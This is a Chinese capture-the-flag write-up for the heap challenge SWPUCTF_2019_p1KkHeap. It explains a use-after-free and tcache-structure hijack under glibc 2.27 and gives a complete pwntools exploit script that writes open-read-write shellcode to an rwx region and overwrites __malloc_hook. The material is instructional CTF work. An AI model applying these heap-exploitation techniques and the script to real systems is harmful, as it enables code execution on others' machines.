SWPUCTF_2019_p1KkHeap

查看保护

开了沙盒，用orw来读即可。

这里mmap了0x66660000这一段内存rwx权限。所以我们可以将shellcode放入这里。

一个uaf漏洞
攻击思路：因为有一个uaf，便是delete只能用三次。所以可以考虑攻击tcache这个结构体。然后劫持这个结构体实现任意地址分配
1.首先需要泄露一个heap_addr用这个heap_addr来计算出tcache的地址。创建的堆块超过fatstbin的大小即可。这里笔者选的是0x100
2.泄露出了tcache的地址，利用double free申请过去。
3.此时我们再次add三个一样大小的堆(0x100)这个时候tcache里的count就变成了-1也就是0xff
4.因为count变成了-1，2.27下count超过了7就会进入fastbin和unstortedbin这里，很明显0xff已经超过了7。
5.因为count超过了7所以delete 0x100的时候会直接进入unstrotedbin
6.泄露出libc。
7.控制tcache的堆块分配，改成0x66660000这里，然后在这里写入shellcode
8.控制tcache的堆块分配，改成malloc_hook这里，在这里写入0x66660000
9.add的时候调用malloc，malloc调用0x66660000，0x66660000这里有shellcode
10.getshell

from pwn import *context(arch='amd64', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj.cn', 25867)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)menu = 'Your Choice: 'def add(size):r.sendlineafter(menu, '1')r.sendlineafter('size: ', str(size))def show(index):r.sendlineafter(menu, '2')r.sendlineafter('id: ', str(index))def edit(index, content):r.sendlineafter(menu, '3')r.sendlineafter('id: ', str(index))r.sendafter('content: ', content)def delete(index):r.sendlineafter(menu, '4')r.sendlineafter('id: ', str(index))add(0x100)  #0
add(0x40)   #1delete(0)
delete(0)show(0)r.recvuntil('content: ')
tcache_addr = u64(r.recv(6).ljust(8, b'\x00')) - 0x198
success('tcache_addr = ' + hex(tcache_addr))add(0x100)  #2edit(2, p64(tcache_addr))add(0x100)  #3
add(0x100)  #4delete(0)show(0)malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
success('malloc_hook = ' + hex(malloc_hook))shellcode = shellcraft.open('./flag', 0)
shellcode += shellcraft.read(3, 0x66660000, 0x100)
shellcode += shellcraft.write(1, 0x66660000, 0x100)
shellcode = asm(shellcode)edit(4, p64(0x66660000))add(0x100) #5
edit(5, shellcode)edit(4, p64(malloc_hook))add(0x100)  #6edit(6, p64(0x66660000))add(0x10)r.interactive()

SWPUCTF_2019_p1KkHeap

SWPUCTF_2019_p1KkHeap

SWPUCTF_2019_p1KkHeap相关推荐

最新文章

热门文章